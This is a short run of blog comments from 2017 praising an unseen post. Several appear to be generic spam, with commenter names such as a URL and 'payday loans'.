Jonathon on April 25, 2017 at 3:33 pm
I was just searching for this info for some time. After six hours of continuous Googling, at last I got it in your website. I wonder what is the lack of Google strategy that doesn't rank this kind of informative website at the top of the list. Generally the top web sites are full of garbage.
Tomeka on April 26, 2017 at 1:13 pm
My brother suggested I may like this website. He was entirely right.
This publish truly made my day. You can not consider just how
much time I had spent for this info! Thank you!
Lorene Lame on June 21, 2017 at 10:11 am
Thanks for your marvelous posting! I definitely enjoyed reading it, you're a great author. I will be sure to bookmark your blog and will eventually come back sometime soon. I want to encourage you to continue your great writing, have a nice afternoon!
feminist shirt rage on July 4, 2017 at 5:30 am
Nice post. I was checking continuously this weblog and
I am impressed! Extremely useful information specially
the final phase I take care of such information a lot.
I used to be seeking this particular info for a very long time.
Thanks and best of luck.
http://www.djcrazyjimmy.com/ on July 4, 2017 at 3:09 pm
I read this article fully regarding the difference of hottest and earlier
technologies, it’s amazing article.
payday loans on July 5, 2017 at 7:12 pm
Awesome article.